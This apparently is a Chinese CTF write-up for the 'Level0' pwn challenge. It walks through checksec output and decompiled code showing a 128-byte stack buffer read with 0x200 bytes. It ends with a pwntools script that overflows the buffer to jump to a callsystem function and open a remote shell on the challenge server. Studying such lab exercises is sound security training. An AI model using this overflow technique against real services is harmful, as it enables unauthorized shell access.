首页 > 其他分享 >攻防世界 Level0 PWN

攻防世界 Level0 PWN

时间:2024-04-11 15:22:20浏览次数:18  
标签:function 攻防 No read db Level0 dup PWN buf

查壳

[*] '\level'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

ida

// main
int __cdecl main(int argc, const char **argv, const char **envp)
{
  write(1, "Hello, World\n", 0xDuLL);
  return vulnerable_function(1LL);
}
// vulnerable_function
ssize_t vulnerable_function()
{
  char buf[128]; // [rsp+0h] [rbp-80h] BYREF

  return read(0, buf, 0x200uLL);
}

看到有个栈 buf

-0000000000000080 buf db 128 dup(?)
+0000000000000000  s db 8 dup(?)
+0000000000000008  r db 8 dup(?)

栈大小 80 , s 是上一个的地址, r 是要返回的地址。而且 read 里面可以读大小 200 ,利用 read 溢出覆盖 r

使用 Shift + F12 找到一个 /bin/sh ,对应函数的地址是 400678

callsystem .text 0000000000400596 00000010 00000008 R . . . . B . .

编写脚本

from pwn import *

p = remote("61.147.171.105", 62559)
payload = b'A' * (0x88) + p64(0x400596)
p.sendlineafter('Hello, World\n', payload)
p.interactive()

 

标签:function,攻防,No,read,db,Level0,dup,PWN,buf
From: https://www.cnblogs.com/monyhzc/p/18129322

相关文章

  • 攻防世界 Hello_pwn
    先查壳,只开了NX[*]'\hellopwn'Arch:amd64-64-littleRELRO:PartialRELROStack:NocanaryfoundNX:NXenabledPIE:NoPIE(0x400000) 放进IDA反编译。__int64__fastcallmain(inta1,char**a2,char**a3){......
  • PWN出题小记
    记录一下PWN出题的源码、环境部署。PWN题环境部署图方便的话可以使用pwn_deploy_chroot这个项目。如何安全快速地部署多道ctfpwn比赛题目也可以自己写dockerfile拉取镜像。将题目名命名为pwn,与Dockerfile、ctf.xinetd、start.sh三个文件放在同一目录下,下面提供相......
  • 攻防世界Reverse三星题 zorropub
    题目分析过程 丢到PE里面,无壳,64bit丢到IDA里面,查看mian函数1int__fastcallmain(inta1,char**a2,char**a3)2{3size_ts_len;//rax4intdrink_ID;//[rsp+1Ch][rbp-104h]BYREF5intinput;//[rsp+20h][rbp-100h]BYREF6inti;//[......
  • 攻防世界 debug
    题目分析过程丢到PE里面 一开始,我看到下面的脱壳提示,以为是我没见过的壳,下载了相关工具脱壳——发现脱了后又出现没见过的脱壳提示,根据提示脱壳弄出来的东西怪怪的卡题,查了资料学到一个新知识点:这是一个.NET文件,不脱壳也是可以的,不能用IDA关于.NET的工具,我下了几个体验......
  • 【攻防实操系列+内网渗透】--第1章:内网渗透测试基础①
    内网也指局域网(LocalAreaNetwork,LAN),是指在某一区域内由多台计算机互连而成的计算机组,组网范围通常在数千米以内。在局域网中,可以实现文件管理、应用软件共享、打印机共享、工作组内的日程安排、电子邮件和传真通信服务等。内网是封闭的,可以由办公室内的两台计算机组成,也......
  • 网络攻防中黑客常用的信息收集手段以及信息泄漏途径,详细方法以及工具介绍
    网络攻防中黑客常用的信息收集手段以及信息泄漏途径,详细方法以及工具介绍。网络攻防中的信息收集是黑客攻击前的重要步骤,其目的是通过各种手段获取目标网络的详细信息,以便为后续的攻击活动提供支持。信息收集的手段多种多样,包括但不限于网络扫描、社会工程学、数据挖掘等。......
  • PWN环境搭建
    序环境安装总能捣鼓半天,同样的坑重复踩,干脆记录下来,方便后续回看。VMware安装Ubuntu18虚拟机安装包地址如下,先直接down下来,存在一个方便找的地方。https://mirrors.tuna.tsinghua.edu.cn/ubuntu-releases/18.04/ubuntu-18.04.6-desktop-amd64.iso然后安装教程如下,特别要提......
  • 中间件漏洞攻防学习总结
    前言面试常问的一些中间件,学习总结一下。以下环境分别使用vulhub和vulfocus复现。Apacheapache文件上传(CVE-2017-15715)描述:Apache(音译为阿帕奇)是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行......
  • 【攻防实操系列+域渗透】--域内主机(win7)配置
    1.设置静态IP,将DNS指向域控DNS的作用:定位域控2.创建域用户密码③❗❗❗至此,域内用户已经创建完成。3.把用户加入域❗会让你立即重启。切换用户,输入:new.com\lyj密码③❗❗❗至此,就是域内主机(win7)的大概配置了。......
  • 【攻防实操系列+域渗透】--安装域控(Windows-Server-2008-R2-x64)教程
    1.创建windows2008R2虚拟机选完全安装。第一个是标准版功能很少。不建议选。另外两个任意选。我选的是Enterprse企业版。❗❗❗注意:需要提前了解域控的密码复杂度规则。密码一定要自己记住!!!密码①可以看到界面非常小,不方便操作。❗❗❗需要安装vm......